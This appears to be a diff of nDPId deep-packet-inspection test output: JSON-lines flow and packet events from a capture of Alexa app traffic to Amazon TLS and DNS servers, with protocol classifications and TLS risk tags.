+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196223,"flow_last_seen":1490976196223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196223,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"} +01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01606{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1490976196840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976196840,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WmdAAEARM02sECrYrBAqAQqTADUAK8ZJ2BYBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} 00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1490976196938,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976196938,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP7ApAAEARoZmsECoBrBAq2AA1CpMAO2jR2BaBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AARIFc55"} 00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"} 